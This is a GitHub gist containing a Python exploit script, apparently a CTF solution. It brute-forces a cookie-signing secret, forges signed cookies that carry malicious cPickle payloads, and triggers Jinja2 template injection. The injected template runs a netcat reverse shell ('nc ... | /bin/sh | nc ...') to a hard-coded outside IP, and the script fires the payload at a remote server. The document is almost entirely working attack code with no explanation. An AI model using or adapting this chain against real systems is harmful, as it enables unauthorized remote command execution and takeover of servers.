Skip to content

Instantly share code, notes, and snippets.

@peternguyen93
Created April 14, 2018 10:10
Show Gist options
  • Save peternguyen93/f6747f7a2fbfcfcd66546e77cad8491b to your computer and use it in GitHub Desktop.
Save peternguyen93/f6747f7a2fbfcfcd66546e77cad8491b to your computer and use it in GitHub Desktop.
import requests
import cPickle
import sys
import os
import hashlib
from base64 import b64encode, b64decode
import string
import json
import flask
# class Target(object):
# def __reduce__(self):
# return (__import__, ('json',))
class Target(object):
def __reduce__(self):
return (repr, ('This is marked',))
class Import(object):
def __reduce__(self):
return (__import__, ('flask',))
shell = """
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{{ c.__init__.func_globals['linecache'].__dict__['os'].system('nc 139.59.244.42 31337 | /bin/sh | nc 139.59.244.42 31338') }}
{% endif %}
{% endfor %}
"""
class Execute(object):
def __reduce__(self):
return (flask.render_template_string, (shell,))
local = 'http://localhost:8888/'
remote = 'http://47.75.151.118:9999/'
def bruteforce():
server_cookie = '59ffbf1cbbe71c7f918cf9af735c04dca74126386230590b39bdac432031fa44!VmFhYWFhCnAwCi4='
_hash, data = server_cookie.split('!')
charset = string.ascii_letters + string.digits
# reverse = charset[::-1]
for c in charset:
for k in charset:
for z in charset:
for x in charset:
secret = c + k + z + x
print '[!] Try:',secret
if hashlib.sha256(data + secret).hexdigest() == _hash:
return secret
def cretae_cookie(data,secret):
return '%s!%s' % (hashlib.sha256(data + secret).hexdigest(),data)
# secret = bruteforce()
# print 'Secret:',secret
secret = 'hitb'
local = remote
data = b64encode(cPickle.dumps(Import()))
cookie = {'location' : cretae_cookie(data,secret)}
print cookie
requests.get(local,cookies=cookie)
cookie['location'] = cretae_cookie(b64encode(cPickle.dumps(Execute())),secret)
print cookie
req = requests.get(local,cookies=cookie)
print req.text
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment